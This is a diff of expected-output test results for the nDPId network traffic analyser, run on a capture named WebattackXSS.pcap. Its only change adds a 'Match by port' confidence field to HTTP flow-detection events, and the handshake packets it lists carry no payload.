 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347172098,"flow_last_seen":1499347172098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347172098,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1499347172098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347172098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dk5AAD4GT4KsEAABwKgKMtRaAFDNItnFAAAAAKACchAyrAAAAgQFtAQCCAoBOa+LAAAAAAEDAwc="}
@@ -602,15 +602,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1499347181178,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347181178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iI9AAD4GPUGsEAABwKgKMtS4AFBWujDmAAAAAKACchBIuAAAAgQFtAQCCAoBObhpAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1499347181178,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347181178,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1LiEJRdhVrow56AScSAgTQAAAgQFtAQCCAoD44ngATm4aQEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1499347181179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347181179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iJBAAD4GPUisEAABwKgKMtS4AFBWujDnhCUXYoAQAOW\/UwAAAQEICgE5uGoD44ng"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182191,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347182435,"flow_last_seen":1499347182435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347182435,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1499347182435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347182435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IhAAD4G6UesEAABwKgKMtTGAFDgpGUsAAAAAKACchCJPgAAAgQFtAQCCAoBObmkAAAAAAEDAwc="}
@@ -640,17 +640,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1499347191299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347191299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a9RAAD4GWfysEAABwKgKMtUmAFBoHamYAAAAAKACchC0UQAAAgQFtAQCCAoBOcJMAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1499347191299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347191299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Sai+IEWaB2pmaAScSD5ewAAAgQFtAQCCAoD45PCATnCTAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1499347191300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347191300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a9VAAD4GWgOsEAABwKgKMtUmAFBoHamZoviBF4AQAOWYgwAAAQEICgE5wkwD45PC"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
